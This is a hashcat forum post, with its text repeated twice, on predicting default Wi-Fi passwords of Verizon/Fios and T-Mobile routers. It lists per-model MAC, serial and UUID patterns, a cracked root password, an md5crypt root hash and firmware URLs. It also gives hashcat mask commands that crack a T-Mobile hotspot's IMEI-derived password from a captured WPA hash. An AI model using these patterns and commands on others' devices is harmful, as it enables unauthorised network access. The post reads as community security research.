07-12-2025, 09:55 PM
I didn’t bother to run the scrapes again this week. Since we are really only catching newly listed hits, I will probably update the database every 2-3 weeks from now on. That doesn’t mean that we don’t have some good info to share this week though!
This week I posted the root hashes that I've found for G1100 and NCQ1338, and @Sparton has successfully cracked the G1100 root:thinkgreen. THANKS! We are still looking for $1$7uheFpms$9IpAGF0yM8EV4CvwnpgD.1
I also reached out to @RealEnder, who shared the hcxpcapngtool -D output for all of the Verizon/Fios captures uploaded to WPA-SEC. As we know, the broadcast packets give us the MAC, MANUFACTURER, MODELNAME, SERIALNUMBER, DEVICENAME, UUID, ESSID. The first thing that I did was look for new Models. There are a good many MiFi devices. I looked a few of these up on eBay, and it doesn’t seem like they show their default password since the device has a screen. There are also a good many Extenders/Repeaters that are just broadcasting the Verizon/Fios SSID.
![[Image: attachment.php?aid=1355]](https://hashcat.net/forum/attachment.php?aid=1355)
The one new device that I was able to identify is the LVR5-100, which is a 5g/4g cellular router manufactured by Wistron NeWeb. The device teardown shows the CPU is a stm32wb35, wihich is an Arm Cortex-M4 32-bit RISC core operating at a frequency of up to 64 MHz. Unfortunately, It doesn’t have a QR code, so we haven’t caught it with our scrape. There are only 2 entries for this device, which is unfortunate because the password is an easy to crack 8 character lowercase HEX! This model has been included with LVSKIHP in the packet database.
There is a device that just shows Broadcom and the same SN/UUID for all of the entries. I checked the MAC prefixes 10:78:5B and 70:F2:20 in the password database and identified this model as WCB6200Q. The only model that I didn’t find entries for is the ASK-RTL108, but here are a ton of entries for ALL of the other devices covered in this thread. Let’s take a look...
verizon_broadcast_info .xlsx (Size: 801.98 KB / Downloads: 2)
The verizon_broadcast_info data contains:
ARC-XCI55AX - 688 entries
ASK-NCM1100 - 49 entries
ASK-NCQ1338E - 671 entries
CR1000 - 2448 entries
CME1000 - 18 entries
E3200 - 669 entries
FSNO21VA - 132 entries
G1100 - 2793 entries
G3100 - 3081 entries
LVSKIHP - 15 entries
NVG558HX - 23 entries
WCB6200Q - 265 entries
WNC-CR200A - 327 entries
Total - 11179 entries
Note: Here MACS is what I’ve been calling “steps” throughout the thread. It’s calculated by comparing the differences in MAC address vs differences in Serial number. This results in a whole number that indicates how many MAC addresses each devices occupies.
Model: ARC-XCI55AX
Manufacture: Arcadyan
Device: Titan2
Serial Prefix: ABU GRR
Serial Length: 11
MACS: 4
MAC Prefix: 04:09:86 04:70:56 18:58:80 4C:22:F3 54:B7:BD 74:90:BC 84:90:0A 84:A3:29 8C:83:94 A8:A2:37 AC:B6:87 BC:F8:7E C0:D7:AA C8:99:B2 DC:F5:1B F4:CA:E7
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 04098647eaa3 = bc329e001dd811b2860104098647eaa2
SSID: Verizon_XXXXXX
Model: ASK-NCM1100
Manufacture: Arcadyan
Device: TITAN4
Serial Prefix: ACL ACN ACQ ACR
Serial Length: 11
MACS: 6
MAC Prefix: 38:88:71
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 3888710aee34 = bc329e001dd811b286013888710aee32
SSID: Verizon_XXXXXX
Model: ASK-NCQ1338E
Manufacture: Askey
Device: NCQ1338
Serial Prefix: AA1 AAM ABB ABF ABG G1C G1D G1E
Serial Length: 11
MACS: 4
MAC Prefix: 88:DE:7C 2C:EA:DC 4C:AB:F8 A4:97:33 FC:12:63 74:93:DA
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 2ceadc10f653 = 876543219abcdef012342ceadc10f652
SSID: Verizon_XXXXXX
Model: CR1000
Manufacture: Arcadyan
Device: ath1 or CHR2f
Serial Prefix: ABJ AB2 AAW AAY ACZ ABP ABQ ABV ABW
Serial Length: 11
MACS: 7 (CR1000A) or 9 (CR1000B)
MAC Prefix: 04:70:56 58:96:71 04:09:86 1C:D6:BE 24:41:FE 34:19:4D 3C:F0:83 4C:22:F3 54:B7:BD 74:90:BC 78:67:0E 84:90:0A 84:A3:29 86:67:0E 88:5A:85 8C:83:94 A8:A2:37 AC:91:9B AC:B6:87 BC:F8:7E C8:99:B2 DC:4B:A1 DC:F5:1B
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address. This matches what we discovered earlier.
EX: 047056582046 = 876543219abcdef01234047056582044
SSID: FiOS-XXXXX, Fios-XXXXX or Verizon_XXXXXX
Model: CME1000
Manufacture: Arcadyan
Device: CHR2tte
Serial Prefix: ABA
Serial Length: 11
MACS: 6
MAC Prefix: 4C:22:F3 54:B7:BD 74:90:BC 84:A3:29 8C:83:94 BC:F8:7E DC:F5:1B
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 4c22f34c6688 = bc329e001dd811b286014c22f34c6686
SSID: Verizon_XXXXXX
Model: E3200
Manufacture: Arcadyan
Device: E3200
Serial Prefix: E301 E302 AA62 AA63 AA64
Serial Length: 16
MACS: 6
MAC Prefix: 04:A2:22 3C:BD:C5 62:A2:22 62:BD:C5 62:F8:53 6A:A2:22 6A:BD:C5 6A:F8:53 72:A2:22 72:BD:C5 72:F8:53 74:90:BC B8:F8:53 DC:F5:1B
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: FSNO21VA
Manufacture: Arcadyan
Device: ath0
Serial Prefix: ABH
Serial Length: 11
MACS: 1
MAC Prefix: 98:C8:54
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, but the last 6 digits of X doesn’t match the MAC address
EX: 98c854a7a4e0 = 876543219abcdef0123498c8549951e8
EX: 98c854a8d4af = 876543219abcdef0123498c8549aaa86
SSID: Verizon_XXXXXX
Model: G1100
Manufacture: GreenWave
Device: GreenWave
Serial Prefix: G1A1 G1A2 S1A1
Serial Length: 15
MACS: 5
MAC Prefix: 18:78:D4 20:C0:47 20:C0:C7 29:6A:0B 48:5D:36 C8:A7:0A D4:A9:28
UUID: Appears to be random
SSID: FiOS-XXXXX or Fios-XXXXX
Model: G3100
Manufacture: Arcadyan
Device: G3100
Serial Prefix: G401 G402
Serial Length: 16
MACS: 11 or 8 depending on manufacture date
MAC Prefix: 04:A2:22 3C:BD:C5 B8:F8:53
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: LVSKIHP
Manufacture: WNC
Device: Verizon K2
Serial Prefix: GI1A GI1B (identified from image scrape data)
Serial Length: 12
MACS: Unknown
MAC Prefix: 64:FF:0A 88:5A:85 B8:9F:09 44:E4:EE
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address.
EX: 64ff0a558556 = 876543219abcdef0123464ff0a558554
SSID: Verizon-5G-Home-XXXX or Verizon-LRV5-XXXX
Model: NVG558HX
Manufacture: Commscope
Device: <same as Serial Number>
Serial Prefix: MV2
MACS: 12
MAC Prefix: 20:F3:75 58:60:D8 8C:5A:25 E4:F7:5B
UUID: Appears to be random
SSID: Verizon-XXXX
Model: WCB6200Q
Manufacture: Broadcom
Device: <blank>
Serial Prefix: GWXA GWXB MWXB (identified from image scrape data)
Serial Length: 14
MACS: 16 (calculated from image scrape data)
MAC Prefix: 10:78:5B 4C:8B:30 70:F2:20
UUID: ALL entries show a single UUID d96c7efc2f8938f1efbd6e5148bfa812
SSID: FiOS-XXXXX or Fios-XXXXX
Note: This device is an extender only, so it is broadcasting the base SSID/Password
Model: WNC-CR200A
Manufacture: Arcadyan
Device: ath0 or ath1
Serial Prefix: ACA AC0
Serial Length: 11
MACS: 4
MAC Prefix: 58:96:71 24:41:FE AC:91:9B DC:4B:A1
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 589671080e92 = 876543219abcdef01234589671080e91
SSID: Verizon_XXXXXX
I noticed that the new model from last week, the CME1000 has the device name CHR2tte, which looks very similar to CHR2f (CR1000). So I added it to the firmware fuzzing script and we found the firmware for it!
It seems to extract ok with unblob, leaving us with 3 files. Unfortunately the root is LUKS encrypted and this is where I’m stuck.
![[Image: attachment.php?aid=1351]](https://hashcat.net/forum/attachment.php?aid=1351)
cat CONTROL
BOARD=mt7986a-ax8400-2500wan-emmc-rfb-sb
file kernel
Device Tree Blob version 17, size=21649753, boot CPU=0, string block size=194, DT structure block size=21649160
file root
LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: 8856759b-9e7d-41db-b48e-7f1deb53cbb0
binwalk -Me chr2tte_fw_3.2.0.9.bin
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
Analyzed 1 file for 85 file signatures (187 magic patterns) in 173.0 milliseconds
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
[+] Extraction of tarball data at offset 0x100 completed successfully
---------------------------------------------------------------------------------------------------
sysupgrade-mt7986a-ax8400-2500wan-emmc-rfb-sb/kernel
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
0 0x0 Device tree blob (DTB), version: 17,
CPU ID: 0, total size: 21649465 bytes
----------------------------------------------------------------------------------------------------
[+] Extraction of dtb data at offset 0x0 completed successfully
----------------------------------------------------------------------------------------------------
Analyzed 5 files for 85 file signatures (187 magic patterns) in 1.5 seconds
![[Image: attachment.php?aid=1352]](https://hashcat.net/forum/attachment.php?aid=1352)
Last weeks scrape caught a TMOHS1 from T-Mobile. I noticed that it has HUGE weakness. They use the last 8 digits of the IMEI as the password, and the last 4 digits for the SSID. The admin password is even easier to “guess" 🤣
I reached out to @RealEnder with this info. He confirmed that only 2 of the submitted hashes had been found, but both of them followed this pattern. He was able to quickly crack most of the other hashes; there are now 42 found! Looking back at the found hashes, ALL of the passwords start with the first 4 digits 5000-7999. This leaves us with 3000 possible candidates, which means you could probably crack it live without a handshake haha. It’s a very small contribution, but it makes me happy to have discovered this! Using this hashcat command should instantly crack the hash, here we are on a Raspberry Pi 4.
T-Mobile Hotspot_3613_2.4GHz
WPA*02*f61b53de19d07fb2f875d56fa45269bf*a4d7952abcb0*3e4bdfe15ce0*542d4d6f62696c6520486f7473706f745f333631335f322e3447487a*92ca24dea47338cbdb9eb12cf752aee13e9d5cbab214df0e48ab880d9c1375b0*0103007502010a000000000000000000012513a7b3328129988b18743eadc5e58224c6afa79b6a47acf5ce1ae6c54f01d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
![[Image: attachment.php?aid=1354]](https://hashcat.net/forum/attachment.php?aid=1354)
This week I posted the root hashes that I've found for G1100 and NCQ1338, and @Sparton has successfully cracked the G1100 root:thinkgreen. THANKS! We are still looking for $1$7uheFpms$9IpAGF0yM8EV4CvwnpgD.1
I also reached out to @RealEnder, who shared the hcxpcapngtool -D output for all of the Verizon/Fios captures uploaded to WPA-SEC. As we know, the broadcast packets give us the MAC, MANUFACTURER, MODELNAME, SERIALNUMBER, DEVICENAME, UUID, ESSID. The first thing that I did was look for new Models. There are a good many MiFi devices. I looked a few of these up on eBay, and it doesn’t seem like they show their default password since the device has a screen. There are also a good many Extenders/Repeaters that are just broadcasting the Verizon/Fios SSID.
The one new device that I was able to identify is the LVR5-100, which is a 5g/4g cellular router manufactured by Wistron NeWeb. The device teardown shows the CPU is a stm32wb35, wihich is an Arm Cortex-M4 32-bit RISC core operating at a frequency of up to 64 MHz. Unfortunately, It doesn’t have a QR code, so we haven’t caught it with our scrape. There are only 2 entries for this device, which is unfortunate because the password is an easy to crack 8 character lowercase HEX! This model has been included with LVSKIHP in the packet database.
There is a device that just shows Broadcom and the same SN/UUID for all of the entries. I checked the MAC prefixes 10:78:5B and 70:F2:20 in the password database and identified this model as WCB6200Q. The only model that I didn’t find entries for is the ASK-RTL108, but here are a ton of entries for ALL of the other devices covered in this thread. Let’s take a look...
verizon_broadcast_info .xlsx (Size: 801.98 KB / Downloads: 2)
The verizon_broadcast_info data contains:
ARC-XCI55AX - 688 entries
ASK-NCM1100 - 49 entries
ASK-NCQ1338E - 671 entries
CR1000 - 2448 entries
CME1000 - 18 entries
E3200 - 669 entries
FSNO21VA - 132 entries
G1100 - 2793 entries
G3100 - 3081 entries
LVSKIHP - 15 entries
NVG558HX - 23 entries
WCB6200Q - 265 entries
WNC-CR200A - 327 entries
Total - 11179 entries
Note: Here MACS is what I’ve been calling “steps” throughout the thread. It’s calculated by comparing the differences in MAC address vs differences in Serial number. This results in a whole number that indicates how many MAC addresses each devices occupies.
Model: ARC-XCI55AX
Manufacture: Arcadyan
Device: Titan2
Serial Prefix: ABU GRR
Serial Length: 11
MACS: 4
MAC Prefix: 04:09:86 04:70:56 18:58:80 4C:22:F3 54:B7:BD 74:90:BC 84:90:0A 84:A3:29 8C:83:94 A8:A2:37 AC:B6:87 BC:F8:7E C0:D7:AA C8:99:B2 DC:F5:1B F4:CA:E7
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 04098647eaa3 = bc329e001dd811b2860104098647eaa2
SSID: Verizon_XXXXXX
Model: ASK-NCM1100
Manufacture: Arcadyan
Device: TITAN4
Serial Prefix: ACL ACN ACQ ACR
Serial Length: 11
MACS: 6
MAC Prefix: 38:88:71
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 3888710aee34 = bc329e001dd811b286013888710aee32
SSID: Verizon_XXXXXX
Model: ASK-NCQ1338E
Manufacture: Askey
Device: NCQ1338
Serial Prefix: AA1 AAM ABB ABF ABG G1C G1D G1E
Serial Length: 11
MACS: 4
MAC Prefix: 88:DE:7C 2C:EA:DC 4C:AB:F8 A4:97:33 FC:12:63 74:93:DA
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 2ceadc10f653 = 876543219abcdef012342ceadc10f652
SSID: Verizon_XXXXXX
Model: CR1000
Manufacture: Arcadyan
Device: ath1 or CHR2f
Serial Prefix: ABJ AB2 AAW AAY ACZ ABP ABQ ABV ABW
Serial Length: 11
MACS: 7 (CR1000A) or 9 (CR1000B)
MAC Prefix: 04:70:56 58:96:71 04:09:86 1C:D6:BE 24:41:FE 34:19:4D 3C:F0:83 4C:22:F3 54:B7:BD 74:90:BC 78:67:0E 84:90:0A 84:A3:29 86:67:0E 88:5A:85 8C:83:94 A8:A2:37 AC:91:9B AC:B6:87 BC:F8:7E C8:99:B2 DC:4B:A1 DC:F5:1B
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address. This matches what we discovered earlier.
EX: 047056582046 = 876543219abcdef01234047056582044
SSID: FiOS-XXXXX, Fios-XXXXX or Verizon_XXXXXX
Model: CME1000
Manufacture: Arcadyan
Device: CHR2tte
Serial Prefix: ABA
Serial Length: 11
MACS: 6
MAC Prefix: 4C:22:F3 54:B7:BD 74:90:BC 84:A3:29 8C:83:94 BC:F8:7E DC:F5:1B
UUID: All entries are bc329e001dd811b28601XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address
EX: 4c22f34c6688 = bc329e001dd811b286014c22f34c6686
SSID: Verizon_XXXXXX
Model: E3200
Manufacture: Arcadyan
Device: E3200
Serial Prefix: E301 E302 AA62 AA63 AA64
Serial Length: 16
MACS: 6
MAC Prefix: 04:A2:22 3C:BD:C5 62:A2:22 62:BD:C5 62:F8:53 6A:A2:22 6A:BD:C5 6A:F8:53 72:A2:22 72:BD:C5 72:F8:53 74:90:BC B8:F8:53 DC:F5:1B
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: FSNO21VA
Manufacture: Arcadyan
Device: ath0
Serial Prefix: ABH
Serial Length: 11
MACS: 1
MAC Prefix: 98:C8:54
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, but the last 6 digits of X doesn’t match the MAC address
EX: 98c854a7a4e0 = 876543219abcdef0123498c8549951e8
EX: 98c854a8d4af = 876543219abcdef0123498c8549aaa86
SSID: Verizon_XXXXXX
Model: G1100
Manufacture: GreenWave
Device: GreenWave
Serial Prefix: G1A1 G1A2 S1A1
Serial Length: 15
MACS: 5
MAC Prefix: 18:78:D4 20:C0:47 20:C0:C7 29:6A:0B 48:5D:36 C8:A7:0A D4:A9:28
UUID: Appears to be random
SSID: FiOS-XXXXX or Fios-XXXXX
Model: G3100
Manufacture: Arcadyan
Device: G3100
Serial Prefix: G401 G402
Serial Length: 16
MACS: 11 or 8 depending on manufacture date
MAC Prefix: 04:A2:22 3C:BD:C5 B8:F8:53
UUID: Appears to be random
SSID: Fios-XXXXX or Verizon_XXXXXX
Model: LVSKIHP
Manufacture: WNC
Device: Verizon K2
Serial Prefix: GI1A GI1B (identified from image scrape data)
Serial Length: 12
MACS: Unknown
MAC Prefix: 64:FF:0A 88:5A:85 B8:9F:09 44:E4:EE
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 2 less than the broadcast MAC Address.
EX: 64ff0a558556 = 876543219abcdef0123464ff0a558554
SSID: Verizon-5G-Home-XXXX or Verizon-LRV5-XXXX
Model: NVG558HX
Manufacture: Commscope
Device: <same as Serial Number>
Serial Prefix: MV2
MACS: 12
MAC Prefix: 20:F3:75 58:60:D8 8C:5A:25 E4:F7:5B
UUID: Appears to be random
SSID: Verizon-XXXX
Model: WCB6200Q
Manufacture: Broadcom
Device: <blank>
Serial Prefix: GWXA GWXB MWXB (identified from image scrape data)
Serial Length: 14
MACS: 16 (calculated from image scrape data)
MAC Prefix: 10:78:5B 4C:8B:30 70:F2:20
UUID: ALL entries show a single UUID d96c7efc2f8938f1efbd6e5148bfa812
SSID: FiOS-XXXXX or Fios-XXXXX
Note: This device is an extender only, so it is broadcasting the base SSID/Password
Model: WNC-CR200A
Manufacture: Arcadyan
Device: ath0 or ath1
Serial Prefix: ACA AC0
Serial Length: 11
MACS: 4
MAC Prefix: 58:96:71 24:41:FE AC:91:9B DC:4B:A1
UUID: All entries are 876543219abcdef01234XXXXXXXXXXXX, where X is 1 less than the broadcast MAC Address
EX: 589671080e92 = 876543219abcdef01234589671080e91
SSID: Verizon_XXXXXX
I noticed that the new model from last week, the CME1000 has the device name CHR2tte, which looks very similar to CHR2f (CR1000). So I added it to the firmware fuzzing script and we found the firmware for it!
Code:
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.9.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.11.bin
https://cpe-ems34.verizon.com/firmware/chr2tte_fw_3.2.0.12.binIt seems to extract ok with unblob, leaving us with 3 files. Unfortunately the root is LUKS encrypted and this is where I’m stuck.
cat CONTROL
BOARD=mt7986a-ax8400-2500wan-emmc-rfb-sb
file kernel
Device Tree Blob version 17, size=21649753, boot CPU=0, string block size=194, DT structure block size=21649160
file root
LUKS encrypted file, ver 1 [aes, xts-plain64, sha256] UUID: 8856759b-9e7d-41db-b48e-7f1deb53cbb0
binwalk -Me chr2tte_fw_3.2.0.9.bin
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
Analyzed 1 file for 85 file signatures (187 magic patterns) in 173.0 milliseconds
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
256 0x100 POSIX tar archive, file count: 4
---------------------------------------------------------------------------------------------------
[+] Extraction of tarball data at offset 0x100 completed successfully
---------------------------------------------------------------------------------------------------
sysupgrade-mt7986a-ax8400-2500wan-emmc-rfb-sb/kernel
---------------------------------------------------------------------------------------------------
DECIMAL HEXADECIMAL DESCRIPTION
---------------------------------------------------------------------------------------------------
0 0x0 Device tree blob (DTB), version: 17,
CPU ID: 0, total size: 21649465 bytes
----------------------------------------------------------------------------------------------------
[+] Extraction of dtb data at offset 0x0 completed successfully
----------------------------------------------------------------------------------------------------
Analyzed 5 files for 85 file signatures (187 magic patterns) in 1.5 seconds
Last weeks scrape caught a TMOHS1 from T-Mobile. I noticed that it has HUGE weakness. They use the last 8 digits of the IMEI as the password, and the last 4 digits for the SSID. The admin password is even easier to “guess" 🤣
I reached out to @RealEnder with this info. He confirmed that only 2 of the submitted hashes had been found, but both of them followed this pattern. He was able to quickly crack most of the other hashes; there are now 42 found! Looking back at the found hashes, ALL of the passwords start with the first 4 digits 5000-7999. This leaves us with 3000 possible candidates, which means you could probably crack it live without a handshake haha. It’s a very small contribution, but it makes me happy to have discovered this! Using this hashcat command should instantly crack the hash, here we are on a Raspberry Pi 4.
T-Mobile Hotspot_3613_2.4GHz
WPA*02*f61b53de19d07fb2f875d56fa45269bf*a4d7952abcb0*3e4bdfe15ce0*542d4d6f62696c6520486f7473706f745f333631335f322e3447487a*92ca24dea47338cbdb9eb12cf752aee13e9d5cbab214df0e48ab880d9c1375b0*0103007502010a000000000000000000012513a7b3328129988b18743eadc5e58224c6afa79b6a47acf5ce1ae6c54f01d9000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac028000*82
Code:
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d<4 digits from SSID>
hashcat -m 22000 -a 3 TMobile.txt -1 567 ?1?d?d?d3613